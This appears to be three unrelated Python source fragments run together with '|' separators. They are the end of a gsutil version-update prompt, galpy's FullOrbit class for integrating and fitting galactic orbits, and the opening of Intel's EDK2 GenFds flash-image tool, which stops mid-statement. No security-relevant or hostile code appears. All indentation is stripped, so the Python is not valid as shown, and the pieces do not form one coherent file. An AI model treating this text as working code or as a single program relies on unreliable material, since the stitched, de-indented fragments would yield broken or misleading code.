with open(LAST_CHECKED_FOR_GSUTIL_UPDATE_TIMESTAMP_FILE, 'w') as f:
f.write(str(cur_ts))
(g, m) = CompareVersions(cur_ver, gslib.VERSION)
if m:
print '\n'.join(textwrap.wrap(
'A newer version of gsutil (%s) is available than the version you '
'are running (%s). NOTE: This is a major new version, so it is '
'strongly recommended that you review the release note details at '
'%s before updating to this version, especially if you use gsutil '
'in scripts.' % (cur_ver, gslib.VERSION, RELEASE_NOTES_URL)))
if gslib.IS_PACKAGE_INSTALL:
return False
print
answer = raw_input('Would you like to update [y/N]? ')
return answer and answer.lower()[0] == 'y'
elif g:
print '\n'.join(textwrap.wrap(
'A newer version of gsutil (%s) is available than the version you '
'are running (%s). A detailed log of gsutil release changes is '
'available at %s if you would like to read them before updating.'
% (cur_ver, gslib.VERSION, RELEASE_NOTES_URL)))
if gslib.IS_PACKAGE_INSTALL:
return False
print
answer = raw_input('Would you like to update [Y/n]? ')
return not answer or answer.lower()[0] != 'n'
return False
|
|
import warnings
import copy
import math as m
import numpy as nu
from scipy import integrate, optimize
import scipy
if int(scipy.__version__.split('.')[1]) < 10: #pragma: no cover
from scipy.maxentropy import logsumexp
else:
from scipy.misc import logsumexp
from galpy.potential_src.Potential import evaluateRforces, evaluatezforces,\
evaluatePotentials, evaluatephiforces, evaluateDensities
from galpy.util import galpyWarning
import galpy.util.bovy_plot as plot
import galpy.util.bovy_symplecticode as symplecticode
import galpy.util.bovy_coords as coords
#try:
from galpy.orbit_src.integrateFullOrbit import integrateFullOrbit_c, _ext_loaded
ext_loaded= _ext_loaded
from galpy.util.bovy_conversion import physical_conversion
from galpy.orbit_src.OrbitTop import OrbitTop
_ORBFITNORMRADEC= 360.
_ORBFITNORMDIST= 10.
_ORBFITNORMPMRADEC= 4.
_ORBFITNORMVLOS= 200.
class FullOrbit(OrbitTop):
"""Class that holds and integrates orbits in full 3D potentials"""
def __init__(self,vxvv=[1.,0.,0.9,0.,0.1],vo=220.,ro=8.0,zo=0.025,
solarmotion=nu.array([-10.1,4.0,6.7])):
"""
NAME:
__init__
PURPOSE:
intialize a full orbit
INPUT:
vxvv - initial condition [R,vR,vT,z,vz,phi]
vo - circular velocity at ro (km/s)
ro - distance from vantage point to GC (kpc)
zo - offset toward the NGP of the Sun wrt the plane (kpc)
solarmotion - value in [-U,V,W] (km/s)
OUTPUT:
(none)
HISTORY:
2010-08-01 - Written - Bovy (NYU)
2014-06-11 - Added conversion kwargs to physical coordinates - Bovy (IAS)
"""
OrbitTop.__init__(self,vxvv=vxvv,
ro=ro,zo=zo,vo=vo,solarmotion=solarmotion)
return None
def integrate(self,t,pot,method='symplec4_c',dt=None):
"""
NAME:
integrate
PURPOSE:
integrate the orbit
INPUT:
t - list of times at which to output (0 has to be in this!)
pot - potential instance or list of instances
method= 'odeint' for scipy's odeint
'leapfrog' for a simple leapfrog implementation
'leapfrog_c' for a simple leapfrog implementation in C
'rk4_c' for a 4th-order Runge-Kutta integrator in C
'rk6_c' for a 6-th order Runge-Kutta integrator in C
'dopr54_c' for a Dormand-Prince integrator in C (generally the fastest)
dt= (None) if set, force the integrator to use this basic stepsize; must be an integer divisor of output stepsize
OUTPUT:
(none) (get the actual orbit using getOrbit()
HISTORY:
2010-08-01 - Written - Bovy (NYU)
"""
#Reset things that may have been defined by a previous integration
if hasattr(self,'_orbInterp'): delattr(self,'_orbInterp')
if hasattr(self,'rs'): delattr(self,'rs')
self.t= nu.array(t)
self._pot= pot
self.orbit= _integrateFullOrbit(self.vxvv,pot,t,method,dt)
@physical_conversion('energy')
def Jacobi(self,*args,**kwargs):
"""
NAME:
Jacobi
PURPOSE:
calculate the Jacobi integral of the motion
INPUT:
Omega - pattern speed of rotating frame
t= time
pot= potential instance or list of such instances
OUTPUT:
Jacobi integral
HISTORY:
2011-04-18 - Written - Bovy (NYU)
"""
if not 'OmegaP' in kwargs or kwargs['OmegaP'] is None:
OmegaP= 1.
if not 'pot' in kwargs or kwargs['pot'] is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit or specify pot=")
else:
pot= kwargs['pot']
if isinstance(pot,list):
for p in pot:
if hasattr(p,'OmegaP'):
OmegaP= p.OmegaP()
break
else:
if hasattr(pot,'OmegaP'):
OmegaP= pot.OmegaP()
kwargs.pop('OmegaP',None)
else:
OmegaP= kwargs.pop('OmegaP')
#Make sure you are not using physical coordinates
old_physical= kwargs.get('use_physical',None)
kwargs['use_physical']= False
if not isinstance(OmegaP,(int,float)) and len(OmegaP) == 3:
if isinstance(OmegaP,list): thisOmegaP= nu.array(OmegaP)
else: thisOmegaP= OmegaP
out= self.E(*args,**kwargs)-nu.dot(thisOmegaP,
self.L(*args,**kwargs).T).T
else:
out= self.E(*args,**kwargs)-OmegaP*self.L(*args,**kwargs)[:,2]
if not old_physical is None:
kwargs['use_physical']= old_physical
else:
kwargs.pop('use_physical')
return out
@physical_conversion('energy')
def E(self,*args,**kwargs):
"""
NAME:
E
PURPOSE:
calculate the energy
INPUT:
t - (optional) time at which to get the energy
pot= potential instance or list of such instances
OUTPUT:
energy
HISTORY:
2010-09-15 - Written - Bovy (NYU)
"""
if not 'pot' in kwargs or kwargs['pot'] is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit or specify pot=")
if 'pot' in kwargs and kwargs['pot'] is None:
kwargs.pop('pot')
else:
pot= kwargs.pop('pot')
if len(args) > 0:
t= args[0]
else:
t= 0.
#Get orbit
thiso= self(*args,**kwargs)
onet= (len(thiso.shape) == 1)
if onet:
return evaluatePotentials(thiso[0],thiso[3],pot,
phi=thiso[5],t=t)\
+thiso[1]**2./2.\
+thiso[2]**2./2.\
+thiso[4]**2./2.
else:
return nu.array([evaluatePotentials(thiso[0,ii],thiso[3,ii],
pot,phi=thiso[5,ii],
t=t[ii])\
+thiso[1,ii]**2./2.\
+thiso[2,ii]**2./2.\
+thiso[4,ii]**2./2. for ii in range(len(t))])
@physical_conversion('energy')
def ER(self,*args,**kwargs):
"""
NAME:
ER
PURPOSE:
calculate the radial energy
INPUT:
t - (optional) time at which to get the energy
pot= potential instance or list of such instances
OUTPUT:
radial energy
HISTORY:
2013-11-30 - Written - Bovy (IAS)
"""
if not 'pot' in kwargs or kwargs['pot'] is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit or specify pot=")
if 'pot' in kwargs and kwargs['pot'] is None:
kwargs.pop('pot')
else:
pot= kwargs.pop('pot')
if len(args) > 0:
t= args[0]
else:
t= 0.
#Get orbit
thiso= self(*args,**kwargs)
onet= (len(thiso.shape) == 1)
if onet:
return evaluatePotentials(thiso[0],0.,pot,
phi=thiso[5],t=t)\
+thiso[1]**2./2.\
+thiso[2]**2./2.
else:
return nu.array([evaluatePotentials(thiso[0,ii],0.,
pot,phi=thiso[5,ii],
t=t[ii])\
+thiso[1,ii]**2./2.\
+thiso[2,ii]**2./2. for ii in range(len(t))])
@physical_conversion('energy')
def Ez(self,*args,**kwargs):
"""
NAME:
Ez
PURPOSE:
calculate the vertical energy
INPUT:
t - (optional) time at which to get the energy
pot= potential instance or list of such instances
OUTPUT:
vertical energy
HISTORY:
2013-11-30 - Written - Bovy (IAS)
"""
if not 'pot' in kwargs or kwargs['pot'] is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit or specify pot=")
if 'pot' in kwargs and kwargs['pot'] is None:
kwargs.pop('pot')
else:
pot= kwargs.pop('pot')
if len(args) > 0:
t= args[0]
else:
t= 0.
#Get orbit
thiso= self(*args,**kwargs)
onet= (len(thiso.shape) == 1)
if onet:
return evaluatePotentials(thiso[0],thiso[3],pot,
phi=thiso[5],t=t)\
-evaluatePotentials(thiso[0],0.,pot,
phi=thiso[5],t=t)\
+thiso[4]**2./2.
else:
return nu.array([evaluatePotentials(thiso[0,ii],thiso[3,ii],
pot,phi=thiso[5,ii],
t=t[ii])\
-evaluatePotentials(thiso[0,ii],0.,
pot,phi=thiso[5,ii],
t=t[ii])\
+thiso[4,ii]**2./2. for ii in range(len(t))])
def e(self,analytic=False,pot=None):
"""
NAME:
e
PURPOSE:
calculate the eccentricity
INPUT:
analytic - compute this analytically
pot - potential to use for analytical calculation
OUTPUT:
eccentricity
HISTORY:
2010-09-15 - Written - Bovy (NYU)
"""
if analytic:
self._setupaA(pot=pot,type='adiabatic')
(rperi,rap)= self._aA.calcRapRperi(self)
return (rap-rperi)/(rap+rperi)
if not hasattr(self,'orbit'):
raise AttributeError("Integrate the orbit first")
if not hasattr(self,'rs'):
self.rs= nu.sqrt(self.orbit[:,0]**2.+self.orbit[:,3]**2.)
return (nu.amax(self.rs)-nu.amin(self.rs))/(nu.amax(self.rs)+nu.amin(self.rs))
@physical_conversion('position')
def rap(self,analytic=False,pot=None,**kwargs):
"""
NAME:
rap
PURPOSE:
return the apocenter radius
INPUT:
analytic - compute this analytically
pot - potential to use for analytical calculation
OUTPUT:
R_ap
HISTORY:
2010-09-20 - Written - Bovy (NYU)
"""
if analytic:
self._setupaA(pot=pot,type='adiabatic')
(rperi,rap)= self._aA.calcRapRperi(self)
return rap
if not hasattr(self,'orbit'):
raise AttributeError("Integrate the orbit first")
if not hasattr(self,'rs'):
self.rs= nu.sqrt(self.orbit[:,0]**2.+self.orbit[:,3]**2.)
return nu.amax(self.rs)
@physical_conversion('position')
def rperi(self,analytic=False,pot=None,**kwargs):
"""
NAME:
rperi
PURPOSE:
return the pericenter radius
INPUT:
analytic - compute this analytically
pot - potential to use for analytical calculation
OUTPUT:
R_peri
HISTORY:
2010-09-20 - Written - Bovy (NYU)
"""
if analytic:
self._setupaA(pot=pot,type='adiabatic')
(rperi,rap)= self._aA.calcRapRperi(self)
return rperi
if not hasattr(self,'orbit'):
raise AttributeError("Integrate the orbit first")
if not hasattr(self,'rs'):
self.rs= nu.sqrt(self.orbit[:,0]**2.+self.orbit[:,3]**2.)
return nu.amin(self.rs)
@physical_conversion('position')
def zmax(self,analytic=False,pot=None,**kwargs):
"""
NAME:
zmax
PURPOSE:
return the maximum vertical height
INPUT:
analytic - compute this analytically
pot - potential to use for analytical calculation
OUTPUT:
Z_max
HISTORY:
2010-09-20 - Written - Bovy (NYU)
2012-06-01 - Added analytic calculation - Bovy (IAS)
"""
if analytic:
self._setupaA(pot=pot,type='adiabatic')
zmax= self._aA.calczmax(self)
return zmax
if not hasattr(self,'orbit'):
raise AttributeError("Integrate the orbit first")
return nu.amax(nu.fabs(self.orbit[:,3]))
def fit(self,vxvv,vxvv_err=None,pot=None,radec=False,lb=False,
customsky=False,lb_to_customsky=None,pmllpmbb_to_customsky=None,
tintJ=10,ntintJ=1000,integrate_method='dopr54_c',
disp=False,
**kwargs):
"""
NAME:
fit
PURPOSE:
fit an Orbit to data using the current orbit as the initial
condition
INPUT:
vxvv - [:,6] array of positions and velocities along the orbit
vxvv_err= [:,6] array of errors on positions and velocities along the orbit (if None, these are set to 0.01)
pot= Potential to fit the orbit in
Keywords related to the input data:
radec= if True, input vxvv and vxvv_err are [ra,dec,d,mu_ra, mu_dec,vlos] in [deg,deg,kpc,mas/yr,mas/yr,km/s] (all J2000.0; mu_ra = mu_ra * cos dec); the attributes of the current Orbit are used to convert between these coordinates and Galactocentric coordinates
lb= if True, input vxvv and vxvv_err are [long,lat,d,mu_ll, mu_bb,vlos] in [deg,deg,kpc,mas/yr,mas/yr,km/s] (mu_ll = mu_ll * cos lat); the attributes of the current Orbit are used to convert between these coordinates and Galactocentric coordinates
customsky= if True, input vxvv and vxvv_err are [custom long,custom lat,d,mu_customll, mu_custombb,vlos] in [deg,deg,kpc,mas/yr,mas/yr,km/s] (mu_ll = mu_ll * cos lat) where custom longitude and custom latitude are a custom set of sky coordinates (e.g., ecliptic) and the proper motions are also expressed in these coordinats; you need to provide the functions lb_to_customsky and pmllpmbb_to_customsky to convert to the custom sky coordinates (these should have the same inputs and outputs as lb_to_radec and pmllpmbb_to_pmrapmdec); the attributes of the current Orbit are used to convert between these coordinates and Galactocentric coordinates
obs=[X,Y,Z,vx,vy,vz] - (optional) position and velocity of observer
(in kpc and km/s) (default=Object-wide default)
Cannot be an Orbit instance with the orbit of the reference point, as w/ the ra etc. functions
ro= distance in kpc corresponding to R=1. (default: taken from object)
vo= velocity in km/s corresponding to v=1. (default: taken from object)
lb_to_customsky= function that converts l,b,degree=False to the custom sky coordinates (like lb_to_radec); needs to be given when customsky=True
pmllpmbb_to_customsky= function that converts pmll,pmbb,l,b,degree=False to proper motions in the custom sky coordinates (like pmllpmbb_to_pmrapmdec); needs to be given when customsky=True
Keywords related to the orbit integrations:
tintJ= (default: 10) time to integrate orbits for fitting the orbit
ntintJ= (default: 1000) number of time-integration points
integrate_method= (default: 'dopr54_c') integration method to use
disp= (False) display the optimizer's convergence message
OUTPUT:
max of log likelihood
HISTORY:
2014-06-17 - Written - Bovy (IAS)
TEST:
from galpy.potential import LogarithmicHaloPotential; lp= LogarithmicHaloPotential(normalize=1.); from galpy.orbit import Orbit; o= Orbit(vxvv=[1.,0.1,1.1,0.1,0.02,0.]); ts= numpy.linspace(0,10,1000); o.integrate(ts,lp); outts= [0.,0.1,0.2,0.3,0.4]; vxvv= numpy.array([o.R(outts),o.vR(outts),o.vT(outts),o.z(outts),o.vz(outts),o.phi(outts)]).T; of= Orbit(vxvv=[1.02,0.101,1.101,0.101,0.0201,0.001]); of._orb.fit(vxvv,pot=lp,radec=False,tintJ=10,ntintJ=1000)
"""
if pot is None:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit first or specify pot=")
if radec or lb or customsky:
obs, ro, vo= self._parse_radec_kwargs(kwargs,vel=True,dontpop=True)
else:
obs, ro, vo= None, None, None
if customsky \
and (lb_to_customsky is None or pmllpmbb_to_customsky is None):
raise IOError('if customsky=True, the functions lb_to_customsky and pmllpmbb_to_customsky need to be given')
new_vxvv, maxLogL= _fit_orbit(self,vxvv,vxvv_err,pot,radec=radec,lb=lb,
customsky=customsky,
lb_to_customsky=lb_to_customsky,
pmllpmbb_to_customsky=pmllpmbb_to_customsky,
tintJ=tintJ,ntintJ=ntintJ,
integrate_method=integrate_method,
ro=ro,vo=vo,obs=obs,disp=disp)
#Setup with these new initial conditions
self.vxvv= new_vxvv
return maxLogL
def plotEz(self,*args,**kwargs):
"""
NAME:
plotEz
PURPOSE:
plot Ez(.) along the orbit
INPUT:
bovy_plot.bovy_plot inputs
OUTPUT:
figure to output device
HISTORY:
2014-06-16 - Written - Bovy (IAS)
"""
if kwargs.pop('normed',False):
kwargs['d2']= 'Eznorm'
else:
kwargs['d2']= 'Ez'
self.plot(*args,**kwargs)
def plotER(self,*args,**kwargs):
"""
NAME:
plotER
PURPOSE:
plot ER(.) along the orbit
INPUT:
bovy_plot.bovy_plot inputs
OUTPUT:
figure to output device
HISTORY:
2014-06-16 - Written - Bovy (IAS)
"""
if kwargs.pop('normed',False):
kwargs['d2']= 'ERnorm'
else:
kwargs['d2']= 'ER'
self.plot(*args,**kwargs)
def plotEzJz(self,*args,**kwargs):
"""
NAME:
plotEzJz
PURPOSE:
plot E_z(.)/sqrt(dens(R)) along the orbit
INPUT:
pot= Potential instance or list of instances in which the orbit was
integrated
d1= - plot Ez vs d1: e.g., 't', 'z', 'R', 'vR', 'vT', 'vz'
+bovy_plot.bovy_plot inputs
OUTPUT:
figure to output device
HISTORY:
2010-08-08 - Written - Bovy (NYU)
"""
labeldict= {'t':r'$t$','R':r'$R$','vR':r'$v_R$','vT':r'$v_T$',
'z':r'$z$','vz':r'$v_z$','phi':r'$\phi$',
'x':r'$x$','y':r'$y$','vx':r'$v_x$','vy':r'$v_y$'}
if not 'pot' in kwargs:
try:
pot= self._pot
except AttributeError:
raise AttributeError("Integrate orbit first or specify pot=")
else:
pot= kwargs.pop('pot')
d1= kwargs.pop('d1','t')
self.EzJz= [(evaluatePotentials(self.orbit[ii,0],self.orbit[ii,3],
pot,t=self.t[ii])-
evaluatePotentials(self.orbit[ii,0],0.,pot,
phi= self.orbit[ii,5],t=self.t[ii])+
self.orbit[ii,4]**2./2.)/\
nu.sqrt(evaluateDensities(self.orbit[ii,0],0.,pot,phi=self.orbit[ii,5],t=self.t[ii]))\
for ii in range(len(self.t))]
if not 'xlabel' in kwargs:
kwargs['xlabel']= labeldict[d1]
if not 'ylabel' in kwargs:
kwargs['ylabel']= r'$E_z/\sqrt{\rho}$'
if d1 == 't':
plot.bovy_plot(nu.array(self.t),nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'z':
plot.bovy_plot(self.orbit[:,3],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'R':
plot.bovy_plot(self.orbit[:,0],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'vR':
plot.bovy_plot(self.orbit[:,1],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'vT':
plot.bovy_plot(self.orbit[:,2],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
elif d1 == 'vz':
plot.bovy_plot(self.orbit[:,4],nu.array(self.EzJz)/self.EzJz[0],
*args,**kwargs)
def _integrateFullOrbit(vxvv,pot,t,method,dt):
"""
NAME:
_integrateFullOrbit
PURPOSE:
integrate an orbit in a Phi(R,z,phi) potential
INPUT:
vxvv - array with the initial conditions stacked like
[R,vR,vT,z,vz,phi]; vR outward!
pot - Potential instance
t - list of times at which to output (0 has to be in this!)
method - 'odeint' or 'leapfrog'
dt - if set, force the integrator to use this basic stepsize; must be an integer divisor of output stepsize
OUTPUT:
[:,5] array of [R,vR,vT,z,vz,phi] at each t
HISTORY:
2010-08-01 - Written - Bovy (NYU)
"""
#First check that the potential has C
if '_c' in method:
if isinstance(pot,list):
allHasC= nu.prod([p.hasC for p in pot])
else:
allHasC= pot.hasC
if not allHasC and ('leapfrog' in method or 'symplec' in method):
method= 'leapfrog'
elif not allHasC:
method= 'odeint'
if method.lower() == 'leapfrog':
#go to the rectangular frame
this_vxvv= nu.array([vxvv[0]*nu.cos(vxvv[5]),
vxvv[0]*nu.sin(vxvv[5]),
vxvv[3],
vxvv[1]*nu.cos(vxvv[5])-vxvv[2]*nu.sin(vxvv[5]),
vxvv[2]*nu.cos(vxvv[5])+vxvv[1]*nu.sin(vxvv[5]),
vxvv[4]])
#integrate
out= symplecticode.leapfrog(_rectForce,this_vxvv,
t,args=(pot,),rtol=10.**-8)
#go back to the cylindrical frame
R= nu.sqrt(out[:,0]**2.+out[:,1]**2.)
phi= nu.arccos(out[:,0]/R)
phi[(out[:,1] < 0.)]= 2.*nu.pi-phi[(out[:,1] < 0.)]
vR= out[:,3]*nu.cos(phi)+out[:,4]*nu.sin(phi)
vT= out[:,4]*nu.cos(phi)-out[:,3]*nu.sin(phi)
out[:,3]= out[:,2]
out[:,4]= out[:,5]
out[:,0]= R
out[:,1]= vR
out[:,2]= vT
out[:,5]= phi
elif ext_loaded and \
(method.lower() == 'leapfrog_c' or method.lower() == 'rk4_c' \
or method.lower() == 'rk6_c' or method.lower() == 'symplec4_c' \
or method.lower() == 'symplec6_c' or method.lower() == 'dopr54_c'):
warnings.warn("Using C implementation to integrate orbits",
galpyWarning)
#go to the rectangular frame
this_vxvv= nu.array([vxvv[0]*nu.cos(vxvv[5]),
vxvv[0]*nu.sin(vxvv[5]),
vxvv[3],
vxvv[1]*nu.cos(vxvv[5])-vxvv[2]*nu.sin(vxvv[5]),
vxvv[2]*nu.cos(vxvv[5])+vxvv[1]*nu.sin(vxvv[5]),
vxvv[4]])
#integrate
tmp_out, msg= integrateFullOrbit_c(pot,this_vxvv,
t,method,dt=dt)
#go back to the cylindrical frame
R= nu.sqrt(tmp_out[:,0]**2.+tmp_out[:,1]**2.)
phi= nu.arccos(tmp_out[:,0]/R)
phi[(tmp_out[:,1] < 0.)]= 2.*nu.pi-phi[(tmp_out[:,1] < 0.)]
vR= tmp_out[:,3]*nu.cos(phi)+tmp_out[:,4]*nu.sin(phi)
vT= tmp_out[:,4]*nu.cos(phi)-tmp_out[:,3]*nu.sin(phi)
out= nu.zeros((len(t),6))
out[:,0]= R
out[:,1]= vR
out[:,2]= vT
out[:,5]= phi
out[:,3]= tmp_out[:,2]
out[:,4]= tmp_out[:,5]
elif method.lower() == 'odeint' or not ext_loaded:
vphi= vxvv[2]/vxvv[0]
init= [vxvv[0],vxvv[1],vxvv[5],vphi,vxvv[3],vxvv[4]]
intOut= integrate.odeint(_FullEOM,init,t,args=(pot,),
rtol=10.**-8.)#,mxstep=100000000)
out= nu.zeros((len(t),6))
out[:,0]= intOut[:,0]
out[:,1]= intOut[:,1]
out[:,2]= out[:,0]*intOut[:,3]
out[:,3]= intOut[:,4]
out[:,4]= intOut[:,5]
out[:,5]= intOut[:,2]
#post-process to remove negative radii
neg_radii= (out[:,0] < 0.)
out[neg_radii,0]= -out[neg_radii,0]
out[neg_radii,5]+= m.pi
return out
def _FullEOM(y,t,pot):
"""
NAME:
_FullEOM
PURPOSE:
implements the EOM, i.e., the right-hand side of the differential
equation
INPUT:
y - current phase-space position
t - current time
pot - (list of) Potential instance(s)
OUTPUT:
dy/dt
HISTORY:
2010-04-16 - Written - Bovy (NYU)
"""
l2= (y[0]**2.*y[3])**2.
return [y[1],
l2/y[0]**3.+evaluateRforces(y[0],y[4],pot,phi=y[2],t=t),
y[3],
1./y[0]**2.*(evaluatephiforces(y[0],y[4],pot,phi=y[2],t=t)-
2.*y[0]*y[1]*y[3]),
y[5],
evaluatezforces(y[0],y[4],pot,phi=y[2],t=t)]
def _rectForce(x,pot,t=0.):
"""
NAME:
_rectForce
PURPOSE:
returns the force in the rectangular frame
INPUT:
x - current position
t - current time
pot - (list of) Potential instance(s)
OUTPUT:
force
HISTORY:
2011-02-02 - Written - Bovy (NYU)
"""
#x is rectangular so calculate R and phi
R= nu.sqrt(x[0]**2.+x[1]**2.)
phi= nu.arccos(x[0]/R)
sinphi= x[1]/R
cosphi= x[0]/R
if x[1] < 0.: phi= 2.*nu.pi-phi
#calculate forces
Rforce= evaluateRforces(R,x[2],pot,phi=phi,t=t)
phiforce= evaluatephiforces(R,x[2],pot,phi=phi,t=t)
return nu.array([cosphi*Rforce-1./R*sinphi*phiforce,
sinphi*Rforce+1./R*cosphi*phiforce,
evaluatezforces(R,x[2],pot,phi=phi,t=t)])
def _fit_orbit(orb,vxvv,vxvv_err,pot,radec=False,lb=False,
customsky=False,lb_to_customsky=None,
pmllpmbb_to_customsky=None,
tintJ=100,ntintJ=1000,integrate_method='dopr54_c',
ro=None,vo=None,obs=None,disp=False):
"""Fit an orbit to data in a given potential"""
#Import here, because otherwise there is an infinite loop of imports
from galpy.actionAngle import actionAngleIsochroneApprox
#Mock this up, bc we want to use its orbit-integration routines
class mockActionAngleIsochroneApprox(actionAngleIsochroneApprox):
def __init__(self,tintJ,ntintJ,pot,integrate_method='dopr54_c'):
self._tintJ= tintJ
self._ntintJ=ntintJ
self._tsJ= nu.linspace(0.,self._tintJ,self._ntintJ)
self._pot= pot
self._integrate_method= integrate_method
return None
tmockAA= mockActionAngleIsochroneApprox(tintJ,ntintJ,pot,
integrate_method=integrate_method)
opt_vxvv= optimize.fmin_powell(_fit_orbit_mlogl,orb.vxvv,
args=(vxvv,vxvv_err,pot,radec,lb,
customsky,lb_to_customsky,
pmllpmbb_to_customsky,
tmockAA,
ro,vo,obs),
disp=disp)
maxLogL= -_fit_orbit_mlogl(opt_vxvv,vxvv,vxvv_err,pot,radec,lb,
customsky,lb_to_customsky,pmllpmbb_to_customsky,
tmockAA,
ro,vo,obs)
return (opt_vxvv,maxLogL)
def _fit_orbit_mlogl(new_vxvv,vxvv,vxvv_err,pot,radec,lb,
customsky,lb_to_customsky,pmllpmbb_to_customsky,
tmockAA,
ro,vo,obs):
"""The log likelihood for fitting an orbit"""
#Use this _parse_args routine, which does forward and backward integration
iR,ivR,ivT,iz,ivz,iphi= tmockAA._parse_args(True,False,
new_vxvv[0],
new_vxvv[1],
new_vxvv[2],
new_vxvv[3],
new_vxvv[4],
new_vxvv[5])
if radec or lb or customsky:
#Need to transform to (l,b), (ra,dec), or a custom set
#First transform to X,Y,Z,vX,vY,vZ (Galactic)
X,Y,Z = coords.galcencyl_to_XYZ(iR.flatten(),iphi.flatten(),
iz.flatten(),
Xsun=obs[0]/ro,
Ysun=obs[1]/ro,
Zsun=obs[2]/ro)
vX,vY,vZ = coords.galcencyl_to_vxvyvz(ivR.flatten(),ivT.flatten(),
ivz.flatten(),iphi.flatten(),
vsun=nu.array(\
obs[3:6])/vo)
bad_indx= (X == 0.)*(Y == 0.)*(Z == 0.)
if True in bad_indx: X[bad_indx]+= ro/10000.
lbdvrpmllpmbb= coords.rectgal_to_sphergal(X*ro,Y*ro,Z*ro,
vX*vo,vY*vo,vZ*vo,
degree=True)
if lb:
orb_vxvv= nu.array([lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],
lbdvrpmllpmbb[:,2],
lbdvrpmllpmbb[:,4],
lbdvrpmllpmbb[:,5],
lbdvrpmllpmbb[:,3]]).T
elif radec:
#Further transform to ra,dec,pmra,pmdec
radec= coords.lb_to_radec(lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],degree=True)
pmrapmdec= coords.pmllpmbb_to_pmrapmdec(lbdvrpmllpmbb[:,4],
lbdvrpmllpmbb[:,5],
lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],
degree=True)
orb_vxvv= nu.array([radec[:,0],radec[:,1],
lbdvrpmllpmbb[:,2],
pmrapmdec[:,0],pmrapmdec[:,1],
lbdvrpmllpmbb[:,3]]).T
elif customsky:
#Further transform to ra,dec,pmra,pmdec
customradec= lb_to_customsky(lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],degree=True)
custompmrapmdec= pmllpmbb_to_customsky(lbdvrpmllpmbb[:,4],
lbdvrpmllpmbb[:,5],
lbdvrpmllpmbb[:,0],
lbdvrpmllpmbb[:,1],
degree=True)
orb_vxvv= nu.array([customradec[:,0],customradec[:,1],
lbdvrpmllpmbb[:,2],
custompmrapmdec[:,0],custompmrapmdec[:,1],
lbdvrpmllpmbb[:,3]]).T
else:
#shape=(2tintJ-1,6)
orb_vxvv= nu.array([iR.flatten(),ivR.flatten(),ivT.flatten(),
iz.flatten(),ivz.flatten(),iphi.flatten()]).T
out= 0.
for ii in range(vxvv.shape[0]):
sub_vxvv= (orb_vxvv-vxvv[ii,:].flatten())**2.
#print(sub_vxvv[nu.argmin(nu.sum(sub_vxvv,axis=1))])
if not vxvv_err is None:
sub_vxvv/= vxvv_err[ii,:]**2.
else:
sub_vxvv/= 0.01**2.
out+= logsumexp(-0.5*nu.sum(sub_vxvv,axis=1))
return -out
|
|
## @file
# generate flash image
#
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import print_function
from __future__ import absolute_import
from re import compile
from optparse import OptionParser
from sys import exit
from glob import glob
from struct import unpack
from linecache import getlines
from io import BytesIO
import Common.LongFilePathOs as os
from Common.TargetTxtClassObject import TargetTxtClassObject
from Common.DataType import *
import Common.GlobalData as GlobalData
from Common import EdkLogger
from Common.StringUtils import NormPath
from Common.Misc import DirCache, PathClass, GuidStructureStringToGuidString
from Common.Misc import SaveFileOnChange, ClearDuplicatedInf
from Common.BuildVersion import gBUILD_VERSION
from Common.MultipleWorkspace import MultipleWorkspace as mws
from Common.BuildToolError import FatalError, GENFDS_ERROR, CODE_ERROR, FORMAT_INVALID, RESOURCE_NOT_AVAILABLE, FILE_NOT_FOUND, OPTION_MISSING, FORMAT_NOT_SUPPORTED, OPTION_VALUE_INVALID, PARAMETER_INVALID
from Workspace.WorkspaceDatabase import WorkspaceDatabase
from .FdfParser import FdfParser, Warning
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from .FfsFileStatement import FileStatement
## Version and Copyright
versionNumber = "1.0" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + versionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def main():
global Options
Options = myOptionParser()
EdkLogger.Initialize()
return GenFdsApi(OptionsToCommandDict(Options))
def GenFdsApi(FdsCommandDict, WorkSpaceDataBase=None):
global Workspace
Workspace = ""
ArchList = None
ReturnCode = 0
try:
if FdsCommandDict.get("verbose"):
EdkLogger.SetLevel(EdkLogger.VERBOSE)
GenFdsGlobalVariable.VerboseMode = True
if FdsCommandDict.get("FixedAddress"):
GenFdsGlobalVariable.FixedLoadAddress = True
if FdsCommandDict.get("quiet"):
EdkLogger.SetLevel(EdkLogger.QUIET)
if FdsCommandDict.get("debug"):
EdkLogger.SetLevel(FdsCommandDict.get("debug") + 1)
GenFdsGlobalVariable.DebugLevel = FdsCommandDict.get("debug")
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if not FdsCommandDict.get("Workspace",os.environ.get('WORKSPACE')):
EdkLogger.error("GenFds", OPTION_MISSING, "WORKSPACE not defined",
ExtraData="Please use '-w' switch to pass it or set the WORKSPACE environment variable.")
elif not os.path.exists(FdsCommandDict.get("Workspace",os.environ.get('WORKSPACE'))):
